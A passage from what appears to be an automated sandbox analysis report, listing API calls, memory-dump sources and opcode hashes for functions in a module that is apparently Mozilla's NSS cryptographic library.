Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C62DBBD), ref: 6C62DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C62DFEE

Part of subcall function 6C5C86D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C8716
Part of subcall function 6C5C86D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C8727
Part of subcall function 6C5C86D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C873B
Part of subcall function 6C5C86D0: PR_Unlock.NSS3(?), ref: 6C5C876F
Part of subcall function 6C5C86D0: PR_SetError.NSS3(00000000,00000000), ref: 6C5C8787

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C62DBBD), ref: 6C62DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C62DBBD), ref: 6C62E007

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: f5dca9dec7338d8e4a770dc03be4588757511d8f265e3c084c4b5c430f77dc9c
Instruction ID: f384212cc7c4f5caeb84c634cb6cb3f8acd688022e025757b31b8bcb1c5ee973
Opcode Fuzzy Hash: f5dca9dec7338d8e4a770dc03be4588757511d8f265e3c084c4b5c430f77dc9c
Instruction Fuzzy Hash: 7B31E7B1A0420197E7109E7AAC84A9B77B89F9530CF040135E909D7B52FF39D918CAEA

Function 6C612C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C611289,?), ref: 6C612D72

Part of subcall function 6C613390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C612CA7,E80C76FF,?,6C611289,?), ref: 6C6133E9
Part of subcall function 6C613390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C61342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C611289,?), ref: 6C612D61

Part of subcall function 6C610B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C610B21
Part of subcall function 6C610B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C610B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C611289,?), ref: 6C612D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C611289,?), ref: 6C612DAF

Part of subcall function 6C5CB8F0: PR_CallOnceWithArg.NSS3(6C702178,6C5CBCF0,?), ref: 6C5CB915
Part of subcall function 6C5CB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C5CB933
Part of subcall function 6C5CB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C5CB9C8
Part of subcall function 6C5CB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C5CB9E1

Part of subcall function 6C610A50: SECOID_GetAlgorithmTag_Util.NSS3(6C612A90,E8571076,?,6C612A7C,6C6121F1,?,?,?,00000000,00000000,?,?,6C6121DD,00000000), ref: 6C610A66

Part of subcall function 6C613310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C612D1E,?,?,?,?,00000000,?,?,?,?,?,6C611289), ref: 6C613348

Part of subcall function 6C6106F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C612E70,00000000), ref: 6C610701

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 7688922ef929db4b27ce319a6fc05706ecdf866247c9fa495451e412126364d6
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 7B31CCB6D04205ABDF005E68EC45A9A37A9AF4731EF140130FD159BF91F731E928C7AA

Function 6C5A6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5A6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5A6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5A6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C6C8FE0), ref: 6C5A6CFE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 5286e1fe91d7bb7a87adcf20894c742868fdb8642f4db92f017b1e646fc24c64
Instruction ID: ba0fcf85fbeb23db8f11e5ea3c3536815bbea8867217d333fb1f32e15994aae9
Opcode Fuzzy Hash: 5286e1fe91d7bb7a87adcf20894c742868fdb8642f4db92f017b1e646fc24c64
Instruction Fuzzy Hash: D03183B5A002169FDB08CFA9CC51ABFB7F5EF45248B10443DD905E7750EB319906CBA0

Function 6C6B4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C6B4F5D
free.MOZGLUE(?), ref: 6C6B4F74
free.MOZGLUE(?), ref: 6C6B4F82
GetLastError.KERNEL32 ref: 6C6B4F90

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 142da99d8e2692dfae1baf08ec433fd39636c66a545b1f438a6970a6c361dd9f
Instruction ID: e79c9f5092d7ccd33a06f6e989f59ddeb5271fe6a6a1bd1b55f291661509f3f8
Opcode Fuzzy Hash: 142da99d8e2692dfae1baf08ec433fd39636c66a545b1f438a6970a6c361dd9f
Instruction Fuzzy Hash: C1310975A002199BDB01CF69DC81BEB73BCEF85358F040225E825B7681DB74E9248799

Function 6C5FDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDDF4

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDE17

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5FDE80

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: f0bc6ae3589db55f5ab2e51805b94f9153b063025b819466520efc17df9e2742
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 3F31C4B2A017429BE704CF16CC80652F7A4BFA531CB248629D92987B01E7B1E4A9CF91

Function 6C5EFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C5C5ADC,?,00000000,00000001,?,?,00000000,?,6C5BBA55,?,?), ref: 6C5EFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5EFE5F
PR_Unlock.NSS3(78831D74), ref: 6C5EFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C5EFED6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 4344437b61a905d589f33e8def7e47ef95f4b6f251595572d1e852121797a3e4
Instruction ID: 8593dfc853a1b4c63f5cb9df99cd80354b2d2690d65c1436215eddbe2c9ed7c0
Opcode Fuzzy Hash: 4344437b61a905d589f33e8def7e47ef95f4b6f251595572d1e852121797a3e4
Instruction Fuzzy Hash: C3213432A00225ABD7509F65EC447AA77B8BF0935CF040224DD0567E42EB30F828CBD1

Function 6C5F3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FFE
PR_SetError.NSS3 ref: 6C5F401A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: d14218322f59f2b5728ef8aa713c9a89fac7974b1ddd9f2ef7f5d781ca40ab25
Instruction ID: ded2e119fe10d9eaef8ed1d7da01640fbee18af756e4cb184240be5bb907e8d6
Opcode Fuzzy Hash: d14218322f59f2b5728ef8aa713c9a89fac7974b1ddd9f2ef7f5d781ca40ab25
Instruction Fuzzy Hash: 51318074604704CFD704EF69D98466ABBF4FF88314F01492DD8998BB10EB30E985CB96

Function 6C5E4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E5064

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 4dd01ed9193e500f1efc6b031d9a614af76232937a1465283db3a373372426f5
Instruction ID: 21190f2012d66d6f1645118a33d6c13fadd18a9ab52775f2250e1515f2076731
Opcode Fuzzy Hash: 4dd01ed9193e500f1efc6b031d9a614af76232937a1465283db3a373372426f5
Instruction Fuzzy Hash: 79314DB4A05606DFDB00EF69D88466ABBF4FF48304F108969E859D7B01EB30E894CBD1

Function 6C609F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C60A71A,FFFFFFFF,?,?), ref: 6C609FAB

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C60A71A,6C60A71A,00000000), ref: 6C609FD9

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60136A
Part of subcall function 6C601340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60137E
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?), ref: 6C6013CF
Part of subcall function 6C601340: PR_Unlock.NSS3(?,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C60A71A,6C60A71A,00000000), ref: 6C60A009
PR_SetError.NSS3(FFFFE013,00000000,6C60A71A,6C60A71A,00000000), ref: 6C60A045

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: f003219df74dca915a1b451d64f9163de020c82d221b66a51b64e6890def8468
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 632198B470020A9BF7089F15DD50F66B7A9FF5539CF10C128D81A97781E776D814CB94

Function 6C612DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C612E08

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C612E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C612E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C612E95

Part of subcall function 6C601200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C601228
Part of subcall function 6C601200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C601238
Part of subcall function 6C601200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C60124B
Part of subcall function 6C601200: PR_CallOnce.NSS3(6C702AA4,6C6012D0,00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C60125D
Part of subcall function 6C601200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C60126F
Part of subcall function 6C601200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C601280
Part of subcall function 6C601200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C60128E
Part of subcall function 6C601200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C60129A
Part of subcall function 6C601200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6012A1

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 352b6dfa15189dcf7d3b97c5d4cff16135dd683e0d32df833dd81b31c73e32b6
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 57213BB1E443454BEB00CF189D447AA37646F9330DF114269ED086BB52F7B1D599C399

Function 6C5CACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C5CACC2

Part of subcall function 6C5A2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C5A2F0A
Part of subcall function 6C5A2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5A2F1D

Part of subcall function 6C5A2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C5A0A1B,00000000), ref: 6C5A2AF0
Part of subcall function 6C5A2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C5CAD5E

Part of subcall function 6C5E57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C5AB41E,00000000,00000000,?,00000000,?,6C5AB41E,00000000,00000000,00000001,?), ref: 6C5E57E0
Part of subcall function 6C5E57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5E5843

CERT_DestroyCertList.NSS3(?), ref: 6C5CAD36

Part of subcall function 6C5A2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C5A2F65
Part of subcall function 6C5A2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5A2F83

free.MOZGLUE(?), ref: 6C5CAD4F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 74b44543e78f73fb568e5719f84dee4759e863d3a3314060e57c061d1bd90d32
Instruction ID: 500f4fe6f06bf633f4c699ae4e016a236c193c8fdb19096698d1348a202f086d
Opcode Fuzzy Hash: 74b44543e78f73fb568e5719f84dee4759e863d3a3314060e57c061d1bd90d32
Instruction Fuzzy Hash: BC2192B5E00114CBEB10DFA69C465EE7BB4AF49248F45406CD8096BA00EB31AE55CBA6

Function 6C5F3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5F3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C5F3CAE
PR_Unlock.NSS3(?), ref: 6C5F3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3D02

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 94067ab1c4e9e2d07cf6a343e4f5956443d3aee931cb0184b118c8c272178898
Instruction ID: 230410402d6d0eae6dad8616e513a44c163df15ab2a3448c325181eb7f8cf5ef
Opcode Fuzzy Hash: 94067ab1c4e9e2d07cf6a343e4f5956443d3aee931cb0184b118c8c272178898
